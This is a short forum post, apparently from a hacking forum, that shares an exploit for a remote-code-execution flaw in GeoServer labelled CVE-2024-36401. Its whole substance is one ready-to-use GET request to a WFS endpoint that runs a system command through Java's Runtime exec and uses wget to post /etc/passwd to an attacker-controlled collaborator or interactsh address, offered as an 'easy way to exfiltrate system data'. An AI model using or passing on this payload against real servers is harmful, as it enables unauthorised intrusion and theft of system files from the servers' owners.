exploiting CVE-2024-36401 (RCE GeoServer)

Pipson

Reputable Member
Member
Joined
Threads
6
Posts
40
easy way to exfiltrate system data

Simple GET Payload:

"https://REDACTED[.]com/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=demo_examples:lanl_hex_chromium_shallow_2020&valueReference=exec(java.lang.Runtime.getRuntime(),'wget+--post-file=/etc/passwd+YOUR_BURP_COLLABORATOR_ADDRESS_OR_INTERACTSH_HERE'"
 
  • P
    Created
  • Last reply
  • 0
    Replies
  • 462
    Views
  • 1
    Participants
  • Participants list